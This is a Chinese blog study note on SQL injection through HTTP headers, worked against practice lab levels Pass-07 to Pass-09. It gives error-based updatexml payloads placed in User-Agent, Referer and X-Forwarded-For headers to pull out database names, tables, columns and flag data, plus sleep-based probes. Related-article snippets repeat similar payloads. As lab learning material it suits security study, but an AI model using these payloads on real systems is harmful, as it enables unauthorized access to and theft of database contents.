head请求_SQL注入-HEAD注入(学习笔记)

最新推荐文章于 2024-07-07 08:44:54 发布
最新推荐文章于 2024-07-07 08:44:54 发布
阅读量237 收藏
点赞数
文章标签: head请求

HEAD注入原理

就是在传参的时候,将我们的数据构建在http头部。

超全局变量

PHP 中的许多预定义变量都是“超全局的”,这意味着它们在一个脚本的全部作用域中都可用。

$_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了
$_POST (获取POST传参)
$_GET (获取GET的传参)
$_COOKIE (获取COOKIE的值)
$_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组)
$_SERVER功能强大。
常用的:
$_SERVER[‘HTTP_HOST’] 请求头信息中的Host内容,获取当前域名。
$_SERVER[“HTTP_USER_AGENT”] 获取用户相关信息,包括用户浏览器、操作系统等信息。
$_SERVER[“REMOTE_ADDR”] 浏览网页的用户ip。

Pass-07

1.首先判断是否存在head注入点

用BURP抓个包

1cb375d2b5f13d56a478848c4b01b0e1.png


使用Modify Headers谷歌浏览器插件进行测试
如果回显错误说明存在head注入

1dcaf7cfd348e07435a2b5225b953264.png

609dc7858eca90a66c564c2a4a83ba75.png

2.查询当前所在库的库名

使用updatexml()函数

‘ or updatexml(1,concat(0x7e,(select database())),1),1)#

60805c9ff1f8ddd6f1a67375a07f25fd.png

5493c99a58b892599cf34c77d9ced7f0.png

3.查询表名

查询到表名

‘ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.columns where table_schema=database())),1),1) #

621701c45cae518719ec60e8c7ac22a2.png

4.查询字段名

‘ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’flag_head’)),1),1) #

30e761d1088bc2e379973a9fa6afb8ec.png

5.查询数据,拿到flag

‘ or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #

e68298892cf059b184a2462d5fba7341.png


不知道为啥 我提交后面两个不管用,提示flag错误(lll¬ω¬)

00ef392b7af5156c9fb46b72d178ff01.png

Pass-08

1.寻找head注入点

通过抓包,并修改referer: ‘ or sleep(5),1)
回显错误

deb09a4180093cbad1ba5baa6de3b8ae.png


判断出注入点在referer:
后续操作与前面一致

Pass-09

使用Modify headers插件添加X-Forwarded-For,插入' or sleep(5),1)
回显错误

441497ab95da9883bed446cd98ba7beb.png


确定存在注入点,后续操作与其他head注入一致

weixin_39793638
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试(三)Head注入1
Cobb_L
09-01 747
盲注 3 —— 通过Head注入 测试靶场(掌控安全学院SQL注入靶场):https://hack.zkaq.cn/battle/target?id=6b59d4693fb1bfbe 分析:以正确账号密码登录后,网站会记录当前User-Agent,以此尝试是否可以在写入User-Agent时注入SQL 通过BurpSuite抓取包,修改User-Agent,尝试通过updatexml()函数报错来获取一些数据库信息 User-Agent: 'or updatexml(1,concat('~',(s
18、SQL HEAD注入
songling515010475的专栏
05-22 365
Head注入的区别与GET/POST的区别在于,HEAD时面的参数如果不存数据库,注入进去是没有任何意义的,而GET/POST在业务增删改查过种中上肯定会要操作数据库的,但现在软件一般都有日志记录,保存到数据库中。 虽然我知道 这是Head注入,但忍不住试一下POST能不能提交,哈哈被过滤了* 进入正题: 获取数据库库名 User-Agent:’ or updatexml(1,concat(0x7e,(select database())),1),1)# User-Agent本身是用于后台识别客户端
掌控安全 -- header注入
最新发布
qq_53058639的博客
07-07 590
header中获取客户端的一些信息(比如useragent用户代理等其他httpheader字段信息),因为这些信息是会重新返回拼接到后台中的,所以再对这些信息进行sql处理,又因为后台没有进过相对应的信息处理所以构成了sql注入。**总结就是:在传参时,后端为了验证或者获取的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了header注入
SQL注入(head注入)---zkaq
weixin_38237216的博客
04-02 1938
1.概念 Head注入:当网站请求中的head信息与数据库有交互的情况下,就可以尝试head注入 常见的超全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) $_SERVER常见的用法:
[SQL]Head First SQL 入门书籍内容总结
热门推荐
TOMACAT的博客
12-20 2万+
1 创建数据库:  CREATE DATABASE gred_lists;  USEgred_lists;   2 设定表: CREATE TABLE doughnut_list (doughnut_name VARCHAR(10),  Doughnut_typeVARCHAR(6) );   3 查看与检查目标表: DESC my_contacts;   4 删除表:
web安全Day01:HEAD注入
坚持硬核
03-05 327
可能出现漏洞的功能模块:登录框 原理: 登录框有时不仅仅查询数据库中有没有对应的用户名和密码,还会将本次登录的ip地址还有请求头存入数据库 因为请求头我们是可以控制的,所以登录框可能存在HEAD注入 select updatexml(1,concat(0x7e,(select database())),1); 0x7e 是波浪号 sqlmap跑header注入: 首先抓包...
SYBASE IQ存储过程学习笔记
09-08
【SYBASE IQ存储过程学习笔记】 在SYBASE IQ数据库中,存储过程是一种强大的工具,它允许用户编写并存储过程化的SQL语句,以便日后重复使用。存储过程不仅可以包含基本的SQL查询,还能够集成诸如LOOP循环、IF和CASE...
Head First SQL阅读笔记
01-08
### Head First SQL 阅读笔记关键知识点梳理 #### 数据库与表的概念 - **数据库**: 它是存储表及其他 SQL 结构的容器。数据库的主要功能是管理数据,确保数据的完整性、一致性和安全性。 - **表**: 表是数据库内...
2009达内SQL学习笔记
02-10
set head off :去掉表头 set feed off :去掉表尾 保存在oracle数据库中的所有操作细节: spool oracleday01.txt :开始记录 spool off :开始保存细节 四、SELECT语句:选择操作、投影操作。 select:从一...
SQL学习笔记
04-20
### SQL学习笔记精要 #### 一、基础知识与环境配置 **标题与描述解析:** 本文档《SQL学习笔记》旨在提供SQL语言的基础知识及常用语法的查询与学习指南,适用于初学者及需要复习SQL技能的专业人士。 **知识点概述...
PHP从入门到精通_html+CSS笔记.rar_8V4_PHP从入门到精通 学习文档_php 学习
09-24
【PHP从入门到精通_html+CSS笔记.rar_8V4_PHP从入门到精通 学习文档_php 学习】 这份压缩包文件包含了两份重要的学习资料,旨在帮助初学者掌握PHP编程语言及其与HTML和CSS的结合应用。PHP是一种广泛使用的服务器端...
head注入(一)
qq_45300786的博客
07-06 3604
head(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-07/index.php 攻击流程:     1;正确登录时用burp抓包。     2;测试head部分是否存在漏洞。     3;获取信息。   测试开始:     测试目标获取管理员账号密码     一些需要提前掌握的函数 order by 原为排序,注入式用来判断字段数 union select 用来判断显示位置,和链表查询(需相同字段数量) information_schema mysql自带数据库
Head注入
monkey:的博客
11-19 276
python大全-iwanna
Stay foolish, stay kind.
06-30 2041
大家好,我是涵子,今天我要分享一个游戏:iwanna——python版本。
head注入(靶场)
qq_39416206的博客
03-08 398
head注入,报错注入
head注入(三)
qq_45300786的博客
07-06 688
在平时上网冲浪中,我们经常去访问一起网站,比如我们经常访问的百度 但是面对越来越多的用户来访问,如果只有一台服务器,那么肯定会崩掉, 那么就有很多台服务器来处理这些请求,以此来满足用户的需求, 1、通过代理来找到离用户最近的服务器。 你提出请求 > 代理商(CDN)> 最近服务器处理你的请求并返回你想要的数据 服务器只会记录下代理商的ip,而不会记录下你的ip,这就会使得灭有你的ip 为了解决这一问题,X-Forwarded-For就出现了,用来记录你的ip, 然后代理商会在自己的数
渗透测试基础-HEAD注入
weixin_45488495的博客
04-08 1027
渗透测试基础-HEAD注入PHP的超全局变量 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 在讲解HEAD注入前,得明白一些前提知识:PHP的超全局变量 PHP的超全局变量 在php中的许多预定义变量都是“超全局的”,这意味着他们在一个脚本的全部作用域中都可以使用。 创建的一些超全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取 $_POST (获取POST传参) $_GET (获
HEAD注入-(掌控安全)
weixin_74410605的博客
07-15 238
其次从上图②处的sql语句中单引号闭合的$uagent结合①处可以得出,注入点是USER_AGENT。分析之后就可以打开burpsuite开始抓包,如下图,发送至repeater。在我们传参时,后端为了验证或者获取客户端的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了注入。除了本关考点告诉我们是head注入,还可以从源码的全局变量猜测出是head注入。发现存在延时注入,从而进一步确认USER_AGENT是注入点。接着查询表名,发现有个表名是flag_head。查询flag_h1里的内容。
Header:请求头参数详解
panying1的博客
12-08 2693
Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内
//未发现冲突,直接保存 Value* new_value = NULL; Node* new_node = ApplyForOneNode(); Node* old_head = bucket->head_node_; if (new_node == NULL) { return NULL; } if (!value) { new_value = value_mem->ApplyOneValue(1); } else { new_value = value; new_value->use_count_++; } if (new_value == NULL) { return NULL; } bucket->head_node_ = new_node; bucket->head_node_->next_node_ = old_head; bucket->head_node_->value_ = new_value; DupKey(new_node->key_, key_data); SetConflictCount(INSERT_TYPE, conflict_count); return bucket->head_node_;什么意思
06-10
2. 暂存bucket的原始头节点old_head; 3. 如果value为空,就申请一个新的value并将其赋值给new_value,否则将value赋值给new_value并增加其引用计数; 4. 将new_node作为新的头节点赋值给bucket,并将其next_node...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值